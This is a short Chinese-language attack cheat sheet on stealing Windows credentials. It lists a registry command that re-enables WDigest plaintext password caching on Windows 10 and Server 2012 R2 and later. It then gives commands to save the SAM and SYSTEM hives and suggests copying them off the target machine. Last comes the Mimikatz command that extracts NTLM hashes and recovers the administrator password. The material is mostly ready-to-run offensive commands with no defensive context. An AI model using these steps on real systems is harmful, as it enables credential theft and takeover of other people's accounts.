当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。
cmd修改注册表命令:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
#重启或用户重新登录后可以成功抓取
cmd修改注册表命令:
1、从注册表读取windows hash
reg save hklm\sam e:\test\sam.hive
reg save hklm\system e:\test\system.hive
2、使用Mimikatz读取SAM和SYSTEM文件中的NTLM-HASH
将这两个hive文件放到和Mimikatz同一个目录下,你可将目标机器的这两个文件拖出来到自己机器上尝试
运行mimikatz输入如下命令:
lsadump::sam /sam:sam.hive /system:system.hive
可成功解密administrator密码。